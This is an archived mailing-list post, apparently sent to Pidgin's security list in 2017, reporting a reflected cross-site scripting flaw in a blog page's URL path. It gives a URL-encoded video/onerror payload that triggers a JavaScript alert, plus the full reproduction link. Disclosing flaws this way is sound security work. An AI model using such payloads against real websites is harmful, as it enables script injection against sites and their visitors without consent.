Vulenrability Report
Vikash Chaudhary
vv130295 at gmail.com
Mon Oct 9 00:41:29 EDT 2017
Vulenrability Name: Cross site scripting
Vulenrable URL :
https://pidgin.im/~elb/blog/architecture.html
Vulenrable item : Path Fragement
Payload =
%22%3Cvideo%3E%3Csource%20onerror%3d%22javascript:alert(9578)%22%3E
How to Reproduce this issue
1. visit this URL
https://pidgin.im/~elb/blog/architecture.html%22%3Cvideo%3E%3Csource%20onerror%3d%22javascript:alert(9578)%22%3E
POC : screenshot enclosed in attachement
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://pidgin.im/cgi-bin/mailman/private/security/attachments/20171009/670f8a57/attachment-0001.html>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: Screen Shot 2017-10-09 at 10.07.08 AM.png
Type: image/png
Size: 250200 bytes
Desc: not available
URL: <https://pidgin.im/cgi-bin/mailman/private/security/attachments/20171009/670f8a57/attachment-0001.png>
More information about the security
mailing list